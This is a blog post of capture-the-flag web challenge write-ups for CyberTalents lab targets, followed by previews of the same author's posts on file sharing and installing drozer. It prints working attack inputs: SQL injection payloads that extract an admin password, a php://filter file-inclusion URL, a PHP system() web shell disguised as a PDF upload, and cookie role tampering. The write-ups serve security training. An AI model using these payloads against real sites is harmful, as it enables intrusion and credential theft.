CYBERTALENTS WEB CHALLENGES WRITEUP

CYBERTALENTS WEB CHALLENGES WRITEUPS


ADMIN HAS THE POWER


So when we open the link we are taken to a login page. I tried admin aas username and admin as password but it didn't go through.


So I decided to take a look at the source code.


```

┌──(you㉿me)-[~]

└─$ curl http://wcamxwl32pue3e6m5p6v4ehxzg1rm2360kxlcg30-web.cybertalentslabs.com                   

<!DOCTYPE html>

<html lang="en">

  <head>

    <meta charset="utf-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->

    <title>Admin Panel</title>


    <!-- Bootstrap -->

    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">


    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->

    <!--[if lt IE 9]>

      <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>

      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>

    <![endif]-->

    <!-- TODO: remove this line ,  for maintenance purpose use this info (user:support password:x34245323)-->

  </head>

  <body>

        <div class="container" style="padding-top   :150px;">

            <div class="row">

                <div class="col-sm-6 col-sm-offset-3">

                                        <form class="form-horizontal" method="post" action="">

                      <div class="form-group">

                        <label for="username" class="col-sm-2 control-label">Username</label>

                        <div class="col-sm-10">

                          <input name="username" type="text" class="form-control" id="username" placeholder="Username">

                        </div>

                      </div>

                      <div class="form-group">

                        <label for="password" class="col-sm-2 control-label">Password</label>

                        <div class="col-sm-10">

                          <input name="password" type="password" class="form-control" id="password" placeholder="Password">

                        </div>

                      </div>


                      <div class="form-group">

                        <div class="col-sm-offset-2 col-sm-10">

                          <button type="submit" class="btn btn-default">Sign in</button>

                        </div>

                      </div>

                    </form>

                                    </div>

            </div>

        </div>

    <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>

    <!-- Include all compiled plugins (below), or include individual files as needed -->

    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>

    <script>


    </script>

  </body>

</html>

```

We see a user name and password (user:support, password:x34245323) so I gave it a shot.

So after doing soo I logged in but didn't find any flag but we have left a clue.



Here we see a clue that you need better privileges meaning user support has no admin rights. So I took a look at the cookies using the cookie editor extension and I saw a category called role and changed the role to admin.



Bang!! You get the flag.


THIS IS SPARTA

In this challenge were are find ourselves on a login page and now I try the common usernames and passwords but none of them seem to work. So I decided to look at the source code and there it was a javascript obfuscated code, so I decided to decode it using lelinhtinh.github.io/de4js/ and I got the following;





so we see an array of words.


```

var _0xae5b = ["value", "user", "getElementById", "pass", "Cyber-Talent", "                      Congratz \x0A\x0A", "wrong Password"];


function check() {

    var _0xeb80x2 = document[_0xae5b[2]](_0xae5b[1])[_0xae5b[0]];

    var _0xeb80x3 = document[_0xae5b[2]](_0xae5b[3])[_0xae5b[0]];

    if (_0xeb80x2 == _0xae5b[4] && _0xeb80x3 == _0xae5b[4]) {

        alert(_0xae5b[5]);

    } else {

        alert(_0xae5b[6]);

    }

}

```


From this code we can say the following;


```

var _0xeb80x2 = document[getElementById] [user] [value];

var _0xeb80x3 = document[getElementById] [pass] [value];

if (_0xeb80x2 == [pass] && _0xeb80x3 == Cyber-Talent){

    alert(Congratz \x0A\x0A")

}else {

    alert(wrong Password")

}

```


So from here, we see that the username and password should be Cyber-Talent.

When we login in with these credentials we see a pop-up containing the flag.





SHARE THE IDEAS

When we click are taken to a page where we have to log in so that we can be able to comment.


I created an account and logged in. I typed a and it was added to the comments. I added an ' and I got an error and noticed the site was vulnerable to SQL injection. From the error given I noticed it used SQLite


So to get the version of SQLite being used the following payload worked;


```

a' || (select sqlite_version()));--

```


After that, I wanted to know what tables are in the DB,  so I ran the following;


```

a' || (select sql from sqlite_master));--

```


The above showed the following results;




After seeing this, coming up with the final command to give the password was easy;


```

a' || (select password from xde43_users where role="admin"));--

```




DARK PROJECT

On clicking the link we go to a website that at first looks soo normal. On clicking the contact, about and project you notice that nothing is changing. 


So I decided to look at the link and noticed something very fishy;


```

http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=about

```


So the payload that works is the PHP encode to base64 and it worked like magic.


```

http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=php://filter/convert.base64-encode/resource=index

```




Since it is in base64 string, I copied the base64 encoded text and went to CyberChef and decode it.





JOIN TEAM

This challenge was a bit tricky but after doing some research I was able to come up with the solution.

We can see that there is a place to upload files but only .pdf files are allowed



So I did the following;


```

──(you㉿me)-[~]

└─$ echo "<?php system('ls'); ?>" >test.txt


┌──(you㉿me)-[~]

└─$ mv test.txt test.pdf


```


I uploaded the test.pdf and magic!! It was successfully uploaded.





So I clicked on the test.pdf and I noticed something at the URL...



I saw the /data/test.pdf so I copied it as follows;


```

data/test.pdf


http://wcamxwl32pue3e6m86dv92kb4zlgm2360kxlcg30-web.cybertalentslabs.com/index.php?jobs and added data/test.pdf and the ls command was executed.

```




I edited the PHP code as follows;


```

<? php system('cat index.php'); ?>

```


After that, we get the flag.


I AM A LEGEND


In this challenge, we are given a login page. I tried the default credentials but couldn't log in.


I took a look at the source code and I saw an obfuscated jsfuck code.



Look at the link below and it'll share some light on how to decode the jsfuck ;). 


cybertalents-iam-legend


WEIRD BLOQ

So this was some weird blog as stated. I went to the search bar and tried searching for a random word but it didn't show any results. I thought for a while and decide to put the search for the following;


```

a || b

```


After searching for it, the following was displayed.



I fuzzed the URL and I got a robots.txt file. I opened the robots.txt file and got a git.phps which was a downloadable file that contained the source code;



After minutes of research I finally found the payload that could get the flag


```

h%a' uNion(sElect(t.cOlumn_name)from(sElect(cOlumn_name),(table_namE)from(infOrmation_schema.COLUMNS)having(table_namE)=('FL@g'))t)#

```


More challenges on the way ;).

Comments

Post a Comment

Popular posts from this blog

SHARING FILES BETWEEN TWO LINUX DEVICES USING ETHERNET

Image
 Hi guys, in this blog I'll be showing you how to share files between two Linux machines using ethernet.  CONFIGURING THE TWO KALI LINUX MACHINES. Navigate to the network settings and click on the +   to add a network and select Ethernet as shown below. Click the create button. You can rename the network connection created to kalitokali as shown below then navigate to the IPV4 Settings tab. While in this tab, click the pull-down arrow at Method  and select Link-Local Only  as shown below, and click on save. Now having done that to the two Linux devices you'll see a connection is established. Now to verify if all is well open the terminal and type ifconfig  and check whether under the ethernet connection there is an assigned IP address. SHARING FILES AND FOLDERS. To share files now we will type the following commands in the terminal. ''' sudo systemctl start ssh.service --> This command will start the ssh service in Kali Linux '''' The reason for s
Read more

SHARING FILES BETWEEN A LINUX AND A WINDOWS MACHINE USING ETHERNET CABLE.

Image
 HOW TO SHARE FILES BETWEEN A LINUX AND A WINDOWS MACHINE USING ETHERNET CABLE In this blog, I will show you step by step how you can share files between a windows machine and a Kali Linux machine. We will start with windows configuration and then go to Linux configuration. WINDOWS CONFIGURATION Go to the search bar and search for the control panel and open it. In the control panel select Network and Internet A new page will be open and select Network and Sharing Center Now connect the ethernet cable in the Linux machine and the windows machine. An Ethernet network connection will appear and you'll click on it. After Clicking on it a pop-up like shown below will show up. On the pop click on the properties button and another pop up will appear. Now on the above pop up look for Internet Protocol Version 4(TCP/IP4)  and select it and after that click on properties. A configuration page will be shown and you'll have to configure it as shown below. ``` 192.168.1.2 ---> This will
Read more

DROZER IN KALI LINUX 2020.4

HOW TO INSTALL DROZER IN KALI LINUX 2021.4 So the whole last year I have been having trouble installing drozer in Kali Linux without necessarily using it in docker. In this article, I will be showing you how I was able to successfully install drozer in kali Linux 2020.4. First, we have to install pip2.7 in our kali machine which is done by: ``` wget https://bootstrap.pypa.io/pip/2.7/get-pip.py  ``` After doing this we get the get-pip.py in the folder we are in. So we use python2 to install the pip2.7 using the get-pip.py. ``` sudo python2 get-pip.py ``` Use which command to verify whether it is installed: ``` ┌──(you㉿me)-[~/Extracted/Software] └─$ which pip2.7                                      /usr/local/bin/pip2.7 ``` After this we have to wget the drozer whl  from Github: ``` wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl ``` After doing so, we install the whl using pip2.7 ``` sudo pip2.7 install drozer-2.4.4-py2-none-any.whl ``` A
Read more